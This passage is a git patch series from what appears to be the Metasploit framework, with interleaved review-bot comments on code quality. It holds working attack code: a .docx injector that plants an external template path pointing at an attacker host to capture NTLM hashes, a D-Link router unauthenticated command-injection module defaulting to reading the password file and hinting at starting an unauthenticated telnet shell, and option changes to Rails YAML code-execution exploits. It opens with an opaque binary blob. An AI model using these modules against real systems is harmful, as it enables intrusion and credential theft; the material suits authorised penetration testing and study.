z6bbzI(T|F#&o(_Ws|9e$c}G1kUgBRt)G<^Z<ySwdJ{c(_=Z*T5cYf>);hB%kl5Srs z>A-qmk@LpfnJSqM1*)iV%YwTW;?o{GLzR{MHZj@eVNzmEskV*5fSfmzjMBtJR<M03 z>5)9<Z<NQ{a*}nUzs*$mAKSg~3Fd6%yczsnQKEk4LG9FcUb{QcXd~y{r&w$7AOChH z6{P|=Jo{nspHNQZycwpp#sx|XH?_K7o4REx$xE^F}&NhjxxT&%syE53<p(dUWT ztQI%#W#idToS~NXom8&$QG@xaC(aPT=iVFIw1wb7&a*J5){>K5qKAq5_=z(};O5qv zuzUp)M=r{%N!fb~+z<{Toj3T$tm211_)lHWC-r82yT2fa<XJXDHiuwK>n}$KGDgn3 zjMfhpxIug%CSM{U!P{3ISdVs1&KtMy$0{E=S}n|rJT)_)xn^nrFZmQ-u+0SC;HgvE zf#L(6qNV&gm^XjnjO0t6dS<5EDfp{lGI;M0i_V{ek(}}QJp&Bmh9If)%o!|$J5X>F z%o2#x3<QhW;I1A&^x~bLA=<AoOCZn%59m}~dr=8`iU|UN{=(c)P|fQ9xP}C^m>@x} zaY)1X=V(qeTfdn5C<5B)j9jeO7g#n);_rWs>Pe_glY7qp2jxS~8@1Iei5mUFM6L71 zqeU-(M$Q{`${a$?5DZ6e`@sbvG6|Aj!usuV$#63mnv>%fD3fiN5+HXob#r<@GscKe zN3EB*tJYYwnH{i}q_ocL1IXcx5<SNV5@oSFb+c{e03%c_wp9ZDGGxv^>2UjC-|8p? zI8s3L{N-eSu$?d?cs0ccj3dSidTttVI*~DQ-m8N|=EKWBwM6r&ShmVUFHnpKpDIZ{ zj89AO3FbbRopSlnB`2XYFBxlu`aDjRz#tx7%tzy~7-1!82^FM~nI7nWBFsGe)!2St zkXovi^5M-gd?NYkJfa;$)VZvO=&ow!Z%h2ex})o%CBS*t?lBd3g2hOZaW=6~az}!E zVRiHjE{hQ;zSEHfts4)-3Xxoxr)=P3?KhgQu^5Sx`~=9=yW{yoga|si{kjC=Bj?e+ zCGwo?<CA$MA0u91wH|*gIRrf(IdATj7xNK5Ca)%AcDHPW_{n)=ja$LL2bN634IiW- z;9IU+O**<Zw^jf)0O7pTFn1$wY&Fv`-BqsWTxf`r^IoU<|H`LYjpE|ARKCp$?ia4| z<5nXnmTpyT{%A%66}6X~cfp>%&SPvQ*77Ye&pTGaDiAKztNcRl@oqLFL6k$@1*{1# zV=c+xOMxYGc)*4<v~Iy~+RU_9JzL-X1=<-o?;Iwz<|Q-}i*9E<4=_2YWhxVrll`y_ zAEX&^A`Nu4WGVF9<cfKvRPWC_=|()S-rK721!p`x*e%V7P)72Ox{*N2r?Q=iizm;A zqoD=8M^xoR>nru$#wuKdeluM1!e*4l&*>2IP|JGh7RtQXbF#BW5Png*k`im(Kukgj zf9~&{+VBB}5emCXtL>0)!dSbEUtHHl5VgnxzQ%5p6#Ts|Y|G<LwegchgjIy@Zwrhe z)}38<#uuhB6E5BhHJLAT7_q!RFa^`EEC0AM9fd^>-!1PiCp-Il-rRvy?R1!paOqdO zranR)C+E%d&QF9I&Bw-=893U$Mj4Scwb&jB8jUVb<XYT1CGs|XzXWY8YJ$Y&Qv&q- zkOWx`6BL}L?34_99+jY00Lco~$3TVp{e%o&oEQ8Z1y?&GgCFMw7xG2$vhy<d^l5y+ zX1?YJq&uqyRAY=>TwX~~0f$^7{33jguMsH4j=5mt^J9XI@f}~;g87|ToB3r)ekE=U zSX0OdwM<F1@#bZ0A-uRBl1ngN-Oq@yY|b#lOWBY^3K!Q12%1YJO&IPI(D<$hR2M=J zcM1pu|FR~6Pa%_7+$|trl`05Wlw9i&o%O?98z-3By%HZ;2wj0l#>zrS#<Z#?CtNZh 
zlOb*v5S+HwFk!{~JxQ<T51PxhMR+jp?{5mD#B~E_{SiaLWWF!}6`g9b{5U5;qUKJM z!PLNHaESl}SDYz>al5Om8@@MQ>&peBA7>M&tf(>K9)U9fVBhR>3XS6#c6<h^=R7?S zpW)ILe1>U{mBPGhpqZq(t;#p#FM>eRbtf+oWJK`Qfo3Ga+O`1Y{vbiHx~+*>mx!)k z_3eix>64!co-SkR3?^!w-I9U_c`~w!g6Hg&!R6vS!T(V3#RD=}tcNJMWT?9bWX$Be z$KK4tgj$$?6l@ODTFrrB0cgGCyyuArv0^HzYQg-6U{7o(gYjJ=kqLyG^GAwq!K3d# zo``l$&YQ=h0Fy_{5VKT-RZkkxEn7k~ejq@L^jh~4J7MHgpqvRe$uD}yNBd6cBu91J zY$lVJ7HR~E83$SaY>K{xoc9=$5F>Dd_@Gd;JG#)Uw0aI%CWiqp?=L5NX)XSBs1YNi zlHH#@`@AJGMUHe&JbyXa8|!O~*Qlq(@jJCO2u9G)3kot!=Yz<}C411}=VZ5d%|k)G zr|1(WPHpi+We9)Cc@KA=cjZ&VjD(`pf)4G^`RpeofSmW#-{=RHYbI$S{Cb!XB#`sW zgdtNeArF$sp}br;YPD#auZ5#lw-}?b=?lvT^L-;V8($J;c2aZq%qVmTDJSPW(%W<R z>Ton~(J)Sfg(dlGjmLeh73HfJYI4vMHC$L>p@Gb@d5J(M&SL|x<{(0{#uA)}11@k$ zUIo>7g}^P?`c4-{E&uueUl@T#`O?5zG6FE)!xEM^vi|zxfvwy>8troGF#?ql1x^ME zI-o(2LnX=k%gGKpMOd)~T6}6GGPd?_jW_qvLwLqRWQ-*7B4gsbvFN;JK(sY2(kLc^ z#c5*-rW2P@Mi{>xY1Vpi=2#G1Lu~=aC|)hfED1VxY{6y$Iq&6Uh*RJO^N~@8+%o9< zt7|fhD3BqAml}3cSWgirpZITObh!=`6_So;LI06-AYb~7Rcm@Ef{S>%xs)QP5FHx= z&|Jk*wLJi$;M9{L2{3!k$ay!d$k+MgB1V$P|J8sSuk-VTQRw!Le19~Gb4oj;C4UlR zMB`fx=ptcz?S{FG>x5vKt=$)muiGcU2o_PkbPlJ$w|cK9F(@Ufk=-A<H)t5-ynDKz z$3o~hN{=oOeREm`spEN{7$a3ASm@6$h(QIdGErcM@_jL$3CqPs&GuuaNY1-cEA=&3 zVvS<vzz_?b6_-#*2<gSj0Y+%VQWvInSk9*bSw#2csgE~_&PyG+N)p@xfynLKbC33W zfsabgJGMn@cwC&xK&a0)j|1BiTZln0{|NFuQ4qWC^!`afA&~Q)Qyf2yDtcLu;2)vD z1@7I3iRn?mBj=4<_`Hdm|8YtdMLQUL(F~{0BQrjd!uMS^!<${iho%{-h=3HOj-vY^ zhlN7kUru()bwLm-W~Y)-R6I(ss?IAwwLpe+ppdpnd|HwbL>dR?$heJyOC`(T8}V2( zP)CyX#iaMzAO>>YGw~(GBx;=mBVID@od6E?ip$^~iT1+0eS+ED9ZmjcHVp*iyx9b& zNc>4j*md?z@~k@}62YsNfCcl0iH0;s#rsgOZ+RjK=3gWl$zq<|En?n)o(f~+yoZHu zd}<PE&e<~dkOIt$B!Np%MdA{{TO=9LBCB3H5J;!z55-!UP)iG}kZDn~j{!uktOo^t zPWJXHGFe#_?eTm{F;7lXlM&gqsssz-(340NY`l~syx5$qE>WQ?AyMCX7W2q6xA!i) zBDExHXfe+xs8S4(O|2_~dlxe@<(HXH!8_{9;Jw9+WRZrfTK3D05H~sRV!PZ>qIRlh z59L*hd$Q7`IM}?`NW$*agR(^42mW?d+w*6^ha5H;^Zs(O&o|;biyO5?jAwJVF8B#8 zo}72#1vi#lCpEAq6ezsjDTpz>nS{+tG0ctsJrvxtxeR`qV#JGT@HA=C#M+3NoOgbj 
z@`Y)rFuycIb|}dLef$Go|01X{<mACgnd+QujA?|vIMt8>qK`T)$u)pQE+sE(^v&zG zl4;ofI%<3VH!qon^v!K8VNfV3Dstbg^P%5@z=B+c7n`1MO4RjfMsa~U=TMI~ef%)d zfh+EX`b!&$3I&ZIo{(+?2z+<c_YT}c$;f%*2lXg`KfkNp%15SqzUS0*B(vSn0tg4w z&Hj1eXa1qjd?AH}^Um`0F$M5<q}Xk|M23f9^$ajP_E`ahQ5hz~r|oXlRgpS!-V75L z7QjCNd|7Aj5U+l)97gR%<hE3%$*c8m8|VLfZZ~Z!fIlJA2r%n^CU_~o<-<yr&gkFw zoq}6-)Y;{!*&x&2rC9kyJ}s|M!o#<53Gn^kN&y%&aO4-6eyd(9PXT)K`tD%?{2j&d zMXs0d6yQH#Xi=>WzOw|*#a1b41c)C0S>=w*fr2CF&8&5hi95rCYfGr&`1gpH#F@C) zfh!7TRw+bxBU1!Naj5(FroUV!<90{vY=U_SIq$*d^(qd&Da#S-rT0O_7&YTsr$V!E f;X0i6-1c+>zP*%@=vP!Js(jZ9s%Gb$sNDYpKbr&S diff --git a/external/source/gui/msfguijava/src/msfgui/RpcConnection.java b/external/source/gui/msfguijava/src/msfgui/RpcConnection.java index b1b7d2c2ac0f..8b754c1871e3 100644 --- a/external/source/gui/msfguijava/src/msfgui/RpcConnection.java +++ b/external/source/gui/msfguijava/src/msfgui/RpcConnection.java @@ -260,7 +260,8 @@ protected RpcConnection doInBackground() throws Exception { // Don't fork cause we'll check if it dies String rpcType = "Basic"; java.util.List args = new java.util.ArrayList(java.util.Arrays.asList(new String[]{ - "msfrpcd","-f","-P",defaultPass,"-t","Msg","-U",defaultUser,"-a","127.0.0.1"})); + "msfrpcd","-f","-P",defaultPass,"-t","Msg","-U",defaultUser,"-a","127.0.0.1", + "-p",Integer.toString(defaultPort)})); if(!defaultSsl) args.add("-S"); if(disableDb) From 03a9723dc8bc03943adc8003b8e4de500a19c7e1 Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Mon, 4 Feb 2013 17:36:02 -0600 Subject: [PATCH 284/421] Update options to use OptEnum for HTTP_METHOD --- modules/exploits/multi/http/rails_json_yaml_code_exec.rb | 3 +-- modules/exploits/multi/http/rails_xml_yaml_code_exec.rb | 3 +-- 2 files changed, 2 insertions(+), 4 deletions(-) diff --git a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb index 4066d047fef5..6fafba24d9de 100644 
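Review bot: The rewritten argument list still hands the RPC password to the child process as `"-P",defaultPass`, so on a multi-user host it can be read from the process listing for as long as msfrpcd runs; the added `-p` argument does not change that. If msfrpcd has no other way to receive the secret, a comment such as `// password is visible in argv; use a generated, per-launch value` above the list would at least record the exposure. The new port value is also passed through unchecked, and a guard like `if (defaultPort < 1 || defaultPort > 65535)` before building the list would reject a bad setting early. doInBackground starts and ends outside this hunk, so whether defaultPort is validated earlier cannot be seen here.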
--- a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb +++ b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb @@ -55,8 +55,7 @@ def initialize(info = {}) [ Opt::RPORT(80), OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]), - OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "POST"]) - + OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST', 'PUT'] ]) ], self.class) end diff --git a/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb b/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb index 8743f76106cd..e5e5311505bc 100644 --- a/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb +++ b/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb @@ -53,8 +53,7 @@ def initialize(info = {}) [ Opt::RPORT(80), OptString.new('URIPATH', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]), - OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "POST"]) - + OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST', 'PUT'] ]) ], self.class) register_evasion_options( From 0f46ed72e1359ed4ac133410725a6cb153ae37d5 Mon Sep 17 00:00:00 2001 From: SphaZ <cyberphaz@gmail.com> Date: Tue, 5 Feb 2013 12:00:04 +0100 Subject: [PATCH 285/421] Using snake_case, fixed using tmp files, changed errorhandling --- modules/auxiliary/docx/word_unc_injector.rb | 314 ++++++++------------ 1 file changed, 120 insertions(+), 194 deletions(-) diff --git a/modules/auxiliary/docx/word_unc_injector.rb b/modules/auxiliary/docx/word_unc_injector.rb index 66c5325d38cb..c234f3dd8e02 100644 --- a/modules/auxiliary/docx/word_unc_injector.rb +++ b/modules/auxiliary/docx/word_unc_injector.rb 
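Review bot: The new option text `'HTTP Method'` drops what the old description said about the setting; something like `'The HTTP request method'` keeps the meaning now that the enum list itself documents the allowed values. The array literal `[true, 'HTTP Method', 'POST', ['GET', 'POST', 'PUT'] ]` also departs from the `[ true, ...` spacing of the option line directly above it. Both points apply equally to the matching hunk in rails_xml_yaml_code_exec.rb, where the neighbouring path option is named URIPATH rather than TARGETURI as in the JSON module. initialize continues outside both hunks.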
@@ -22,7 +22,7 @@ def initialize(info = {}) If emailed the receiver needs to put the document in editing mode before the remote server will be contacted. Preview and read-only mode do not work. Verified to work with Microsoft Word 2003, - 2007 and 2010 as of Januari 2013 date by using auxiliary/server/capture/smb + 2007 and 2010 as of January 2013 date by using auxiliary/server/capture/smb }, 'License' => MSF_LICENSE, 'References' => 
@@ -40,252 +40,178 @@ def initialize(info = {}) OptAddress.new('LHOST',[true, 'Server IP or hostname that the .docx document points to.','']), OptPath.new('SOURCE', [false, 'Full path and filename of .docx file to use as source. If empty, creates new document', '']), OptString.new('FILENAME', [true, 'Document output filename.', 'stealnetNTLM.docx']), - OptString.new('DOCAUTHOR',[false,'Document author for empty document.', 'SphaZ']), + OptString.new('DOCAUTHOR',[false,'Document author for empty document.', '']), ], self.class) end #here we create an empty .docx file with the UNC path. Only done when FILENAME is empty - def makeNewFile - metadataFileData = "" - metadataFileData << "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?><cp:coreProperties" - metadataFileData << " xmlns:cp=\"http://schemas.openxmlformats.org/package/2006/metadata/core-properties\" " - metadataFileData << "xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" " - metadataFileData << "xmlns:dcmitype=\"http://purl.org/dc/dcmitype/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">" - metadataFileData << "<dc:creator>#{datastore['DOCAUTHOR']}</dc:creator><cp:lastModifiedBy>#{datastore['DOCAUTHOR']}" - metadataFileData << "</cp:lastModifiedBy><cp:revision>1</cp:revision><dcterms:created xsi:type=\"dcterms:W3CDTF\">" - metadataFileData << "2013-01-08T14:14:00Z</dcterms:created><dcterms:modified xsi:type=\"dcterms:W3CDTF\">" - metadataFileData << "2013-01-08T14:14:00Z</dcterms:modified></cp:coreProperties>" + def make_new_file + metadata_file_data = "" + metadata_file_data << "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?><cp:coreProperties" + metadata_file_data << " xmlns:cp=\"http://schemas.openxmlformats.org/package/2006/metadata/core-properties\" " + metadata_file_data << "xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" " + metadata_file_data << 
"xmlns:dcmitype=\"http://purl.org/dc/dcmitype/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">" + metadata_file_data << "<dc:creator>#{datastore['DOCAUTHOR']}</dc:creator><cp:lastModifiedBy>#{datastore['DOCAUTHOR']}" + metadata_file_data << "</cp:lastModifiedBy><cp:revision>1</cp:revision><dcterms:created xsi:type=\"dcterms:W3CDTF\">" + metadata_file_data << "2013-01-08T14:14:00Z</dcterms:created><dcterms:modified xsi:type=\"dcterms:W3CDTF\">" + metadata_file_data << "2013-01-08T14:14:00Z</dcterms:modified></cp:coreProperties>" #where to find the skeleton files required for creating an empty document - dataDir = File.join(Msf::Config.install_root, "data", "exploits", "docx") - tmpDir = "#{Dir.tmpdir}/unc_tmp" - - #setup temporary directory structure - begin - cleanupTmp(tmpDir) - FileUtils.mkdir_p("#{tmpDir}/docProps/") - FileUtils.mkdir_p("#{tmpDir}/word/_rels/") - rescue - print_error("Error generating temp directory structure.") - return nil - end - - #here we store our on-the-fly created files - begin - f = File.open("#{tmpDir}/docProps/core.xml", 'wb') - f.write(metadataFileData) - f.close() - f = File.open("#{tmpDir}/word/_rels/settings.xml.rels", 'wb') - f.write(@relsFileData) - f.close() - rescue - print_error("Cant write to temp file.") - cleanupTmp(tmpDir) - return nil - end + data_dir = File.join(Msf::Config.install_root, "data", "exploits", "docx") #making the actual docx - begin - docx = Rex::Zip::Archive.new - #add skeleton files - vprint_status("Adding skeleton files from #{dataDir}") - Dir["#{dataDir}/**/**"].each do |file| - if not File.directory?(file) - docx.add_file(file.sub(dataDir,''), File.read(file)) - end - end - #add on-the-fly created documents - vprint_status("Adding injected files") - Dir["#{Dir.tmpdir}/unc_tmp/**/**"].each do |file| - if not File.directory?(file) - docx.add_file(file.sub("#{Dir.tmpdir}/unc_tmp/",''), File.read(file)) - end + docx = Rex::Zip::Archive.new + #add skeleton files + vprint_status("Adding skeleton 
files from #{data_dir}") + Dir["#{data_dir}/**/**"].each do |file| + if not File.directory?(file) + docx.add_file(file.sub(data_dir,''), File.read(file)) end - #add the otherwise skipped "hidden" file - file = "#{dataDir}/_rels/.rels" - docx.add_file(file.sub(dataDir,''), File.read(file)) - file_create(docx.pack) - rescue - print_error("Error creating empty document #{datastore['FILENAME']}") - cleanupTmp(tmpDir) - return nil end - - cleanupTmp(tmpDir) - return 0 + #add on-the-fly created documents + vprint_status("Adding injected files") + docx.add_file("docProps/core.xml", metadata_file_data) + docx.add_file("word/_rels/settings.xml.rels", @rels_file_data) + #add the otherwise skipped "hidden" file + file = "#{data_dir}/_rels/.rels" + docx.add_file(file.sub(data_dir,''), File.read(file)) + #and lets create the file + file_create(docx.pack) end - #cleaning up of temporary files. If it fails we say so, but continue anyway - def cleanupTmp(dir) - begin - FileUtils.rm_rf(dir) - rescue - print_error("Error cleaning up tmp directory structure.") - end - end - - #here we inject an UNC path into an existing file, and store the injected file in FILENAME - def manipulateFile - #where do we unpack our source file? - tmpDir = "#{Dir.tmpdir}/#{Time.now.to_i}#{rand(1000)}/" + def manipulate_file + #where do we unpack our source files + tmp_dir = "#{Dir.tmpdir}/unc#{Time.now.to_i}#{rand(1000)}/" ref = "<w:attachedTemplate r:id=\"rId1\"/>" - if File.exists?(datastore['SOURCE']) - if not File.stat(datastore['SOURCE']).readable? - print_error("Not enough rights to read the file. Aborting.") - return nil - end - - #lets extract our docx - if unzipDocx(tmpDir).nil? - return nil - end - - fileContent = File.read("#{tmpDir}/word/settings.xml") + if not File.exists?(datastore['SOURCE']) + print_error("File #{datastore['SOURCE']} does not exist.") + return nil + end + + if not File.stat(datastore['SOURCE']).readable? + print_error("Not enough rights to read the file. 
Aborting.") + return nil + end - if not fileContent.index("w:attachedTemplate r:id=\"rId1\"").nil? - vprint_status("Reference to rels file already exists in settings file, we dont need to add it :)") + #lets extract our docx + if unzip_docx(tmp_dir).nil? + return nil + end - #we put just our rels file into the docx - if updateDocxFile(tmpDir,"word/_rels/settings.xml.rels", @relsFileData).nil? - return nil - end + file_content = File.read("#{tmp_dir}/word/settings.xml") - # lets zip the end result - if zipDocx(tmpDir).nil? - return nil + #if we can find the reference, we don't need to add it and can just inject our unc file. + if not file_content.index("w:attachedTemplate r:id=\"rId1\"").nil? + vprint_status("Reference to rels file already exists in settings file, we dont need to add it :)") + update_docx_file(tmp_dir,"word/_rels/settings.xml.rels", @rels_file_data) + # lets zip the end result + zip_docx(tmp_dir) + else + #now insert the reference to the file that will enable our malicious entry + insert_one = file_content.index("<w:defaultTabStop") + + if insert_one.nil? + insert_two = file_content.index("<w:hyphenationZone") # 2nd choice + if not insert_two.nil? + vprint_status("HypenationZone found, we use this for insertion.") + file_content.insert(insert_two, ref ) end else - #now insert the reference to the file that will enable our malicious entry - insertOne = fileContent.index("<w:defaultTabStop") - - if insertOne.nil? - insertTwo = fileContent.index("<w:hyphenationZone") # 2nd choice - if not insertTwo.nil? - vprint_status("HypenationZone found, we use this for insertion.") - fileContent.insert(insertTwo, ref ) - end - else - vprint_status("DefaultTabStop found, we use this for insertion.") - fileContent.insert(insertOne, ref ) - end - - if insertOne.nil? && insertTwo.nil? 
- print_error("Cannot find insert point for reference into settings.xml") - cleanupTmp(tmpDir) - return nil - end + vprint_status("DefaultTabStop found, we use this for insertion.") + file_content.insert(insert_one, ref ) + end - #lets extract our docx - if unzipDocx(tmpDir).nil? - return nil - end + if insert_one.nil? && insert_two.nil? + print_error("Cannot find insert point for reference into settings.xml") + FileUtils.rm_rf(tmp_dir) + return nil + end - #update the files that contain the injection and reference - if updateDocxFile(tmpDir, "word/settings.xml",fileContent).nil? - print_error("Error inserting data into word/settings.xml") - return nil - end - if updateDocxFile(tmpDir, "word/_rels/settings.xml.rels", @relsFileData).nil? - print_error("Eror inserting data into word/_rels/settings.xml.rels") - return nil - end + #update the files that contain the injection and reference + update_docx_file(tmp_dir, "word/settings.xml",file_content) + update_docx_file(tmp_dir, "word/_rels/settings.xml.rels", @rels_file_data) - #lets zip the file - if zipDocx(tmpDir).nil? - return nil - end + #lets zip the file + zip_docx(tmp_dir) + end + return 0 + end + #making the actual docx + def zip_docx(tmp_dir) + docx = Rex::Zip::Archive.new + #add skeleton files + vprint_status("Adding files from #{tmp_dir}") + Dir["#{tmp_dir}/**/**"].each do |file| + if not File.directory?(file) + docx.add_file(file.sub(tmp_dir,''), File.read(file)) end - else - print_error("File #{datastore['SOURCE']} does not exist.") - return nil end - - cleanupTmp(tmpDir) - return 0 + #add the otherwise skipped "hidden" file + file = "#{tmp_dir}/_rels/.rels" + docx.add_file(file.sub(tmp_dir,''), File.read(file)) + file_create(docx.pack) + FileUtils.rm_rf(tmp_dir) end - #making the actual docx - def zipDocx(tmpDir) + #unzip the .docx document. sadly Rex::zip does not uncompress so we do it the Rubyzip way + def unzip_docx(tmp_dir) + #create temoprary directory so we can do some error handling if needed. 
begin - docx = Rex::Zip::Archive.new - #add skeleton files - vprint_status("Adding files from #{tmpDir}") - Dir["#{tmpDir}/**/**"].each do |file| - if not File.directory?(file) - docx.add_file(file.sub(tmpDir,''), File.read(file)) - end + if File.directory?(tmp_dir) + FileUtils.rm_rf(tmp_dir) end - #add the otherwise skipped "hidden" file - file = "#{tmpDir}/_rels/.rels" - docx.add_file(file.sub(tmpDir,''), File.read(file)) - file_create(docx.pack) + FileUtils.mkdir_p(tmp_dir) rescue - print_error("Error creating compressed document #{datastore['FILENAME']}") - cleanupTmp(tmpDir) + print_error("Error creating/deleting temporary directory #{tmp_dir}, check rights.") return nil end - end - - #unzip the .docx document. sadly Rex::zip does not uncompress so we do it the Rubyzip way - def unzipDocx(tmpDir) + #unzip the SOURCE document into the tmp_dir + vprint_status("Rubyzip sometimes corrupts the document, so we do it the hard way. Extracting #{datastore['SOURCE']}") begin - if not File.directory?(tmpDir) - vprint_status("Damn rubyzip cant be relied upon, so we do it the hard way. 
Extracting #{datastore['SOURCE']}") - Zip::ZipFile.open(datastore['SOURCE']) do |fileZip| - fileZip.each do |entry| - fpath = File.join(tmpDir, entry.name) - FileUtils.mkdir_p(File.dirname(fpath)) - fileZip.extract(entry, fpath) - end + Zip::ZipFile.open(datastore['SOURCE']) do |filezip| + filezip.each do |entry| + fpath = File.join(tmp_dir, entry.name) + FileUtils.mkdir_p(File.dirname(fpath)) + filezip.extract(entry, fpath) end end - rescue - print_error("There was an error unzipping.") - cleanupTmp(tmpDir) + rescue Zip::ZipError => e + print_error("Error extracting #{datastore['SOURCE']} please verify it is a valid .docx document.") return nil end return 0 end #used for updating the files inside the docx from a string - def updateDocxFile(tmpDir,fileString, content) - begin - archive = File.join(tmpDir, fileString) - vprint_status("We need to look for: #{archive}") - if File.exists?(archive) - vprint_status("Deleting original file #{archive}") - File.delete(archive) - end - File.open(archive, 'wb+') { |f| f.write(content) } - rescue Exception => ex - print_error("Well, extracting and manipulating the file went wrong :(") - cleanupTmp(tmpDir) - return nil + def update_docx_file(tmp_dir,file_string, content) + archive = File.join(tmp_dir, file_string) + vprint_status("We need to look for: #{archive}") + if File.exists?(archive) + vprint_status("Deleting original file #{archive}") + File.delete(archive) end - return 0 + File.open(archive, 'wb+') { |f| f.write(content) } end def run - #we need this in makeNewFile and manipulateFile - @relsFileData = "" - @relsFileData << "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>".chomp - @relsFileData << "<Relationships xmlns=\"http://schemas.openxmlformats.org/package/2006/relationships\">".chomp - @relsFileData << "<Relationship Id=\"rId1\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/".chomp - @relsFileData << "attachedTemplate\" 
Target=\"file://\\\\#{datastore['LHOST']}\\normal.dot\" TargetMode=\"External\"/></Relationships>" + #we need this in make_new_file and manipulate_file + @rels_file_data = "" + @rels_file_data << "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>".chomp + @rels_file_data << "<Relationships xmlns=\"http://schemas.openxmlformats.org/package/2006/relationships\">".chomp + @rels_file_data << "<Relationship Id=\"rId1\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/".chomp + @rels_file_data << "attachedTemplate\" Target=\"file://\\\\#{datastore['LHOST']}\\normal.dot\" TargetMode=\"External\"/></Relationships>" if "#{datastore['SOURCE']}" == "" #make an empty file print_status("Creating empty document") - if not makeNewFile.nil? - print_good("Success! Empty document #{datastore['FILENAME']} created.") - end + make_new_file else #extract the word/settings.xml and edit in the reference we need print_status("Injecting UNC path into existing document.") - if not manipulateFile.nil? + if not manipulate_file.nil? print_good("Copy of #{datastore['SOURCE']} called #{datastore['FILENAME']} points to #{datastore['LHOST']}.") end end From 43f3bb4fe602755a8b997126428d591fecf82b1a Mon Sep 17 00:00:00 2001 From: m-1-k-3 <github@s3cur1ty.de> Date: Tue, 5 Feb 2013 13:54:10 +0100 Subject: [PATCH 286/421] small updates --- .../http/dlink_dir_300_600_exec_noauth.rb | 19 ++++++++++--------- 1 file changed, 10 insertions(+), 9 deletions(-) diff --git a/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb b/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb index 9b24a0fa80f7..feea8e0d3e4d 100644 --- a/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb +++ b/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb 
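Review bot: In `unzip_docx`, `fpath = File.join(tmp_dir, entry.name)` trusts the entry names stored in the SOURCE archive, so a .docx whose entry names contain `../` components can make `filezip.extract` write outside `tmp_dir` on the machine running the module. Resolve each name against the extraction root and skip anything that lands outside it, as in the excerpt below. In `manipulate_file`, `tmp_dir` is built from `Time.now.to_i` and `rand(1000)` under the shared `Dir.tmpdir`, which other local users can guess; `Dir.mktmpdir` would create a private directory instead. The `rescue Zip::ZipError => e` branch returns without removing `tmp_dir` and never uses `e`.

```ruby
root = File.expand_path(tmp_dir)
Zip::ZipFile.open(datastore['SOURCE']) do |filezip|
  filezip.each do |entry|
    fpath = File.expand_path(entry.name, root)
    # refuse entry names that resolve outside the extraction directory
    unless fpath.start_with?(root + File::SEPARATOR)
      print_error("Skipping unsafe archive entry #{entry.name}")
      next
    end
    # … unchanged: mkdir_p of the parent directory and filezip.extract …
```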
@@ -13,12 +13,13 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'D-Link DIR-600 rev B / DIR-300 rev B unauthenticated Remote Command Execution in command.php', + 'Name' => 'D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution', 'Description' => %q{ - Some D-Link Routers are vulnerable to OS Command injection. + Some D-Link Routers like the DIR-600 rev B and the DIR-300 rev B are + vulnerable to OS Command injection. You do not need credentials to the webinterface because the command.php is accesseble without authentication. You could read the plaintext password - file. + file. Tested versions: DIR-600 2.14b01 and below, DIR-300 rev B 2.13 and below. Hint: To get a remote shell you could start the telnetd without any authentication. }, 'Author' => [ 'm-1-k-3' ], @@ -35,14 +36,14 @@ def initialize(info = {}) register_options( [ Opt::RPORT(80), - OptString.new('CMD', [ true, 'The command to execute', 'cat /var/passwd']) + OptString.new('CMD', [ true, 'The command to execute', 'cat var/passwd']) ], self.class) end def run uri = '/command.php' - print_status("Sending remote command: " + datastore['CMD']) + print_status("#{rhost}:#{rport} - Sending remote command: " + datastore['CMD']) data_cmd = "cmd=#{datastore['CMD']}; echo end" @@ -63,11 +64,11 @@ def run end if res.body.include? "end" - print_status("Exploited successfully") - print_line("Command: #{datastore['CMD']}") - print_line("Output: #{res.body}") + print_status("#{rhost}:#{rport} - Exploited successfully\n") + print_line("#{rhost}:#{rport} - Command: #{datastore['CMD']}\n") + print_line("#{rhost}:#{rport} - Output: #{res.body}") else - print_status("Exploit failed.") + print_status("#{rhost}:#{rport} - Exploit failed.") end end end From 463a45ccafd3ceb6fefffa2a2375615bf64569ec Mon Sep 17 00:00:00 2001 
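Review bot: The result messages in the @@ -63,11 +64,11 @@ hunk mix output helpers and line endings: the success branch now embeds a trailing `\n` in `print_status` and `print_line`, which already end the line themselves, and the failure branch still reports through `print_status`. Using `print_good("#{rhost}:#{rport} - Exploited successfully")` and `print_error("#{rhost}:#{rport} - Exploit failed.")` would match how other modules in this series report outcomes. In the description hunk, "accesseble" should read "accessible". The default for CMD also changes from an absolute to a relative path without explanation in the commit message, so a short comment on that option would help the next maintainer. The body of `run` starts and ends outside these hunks.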
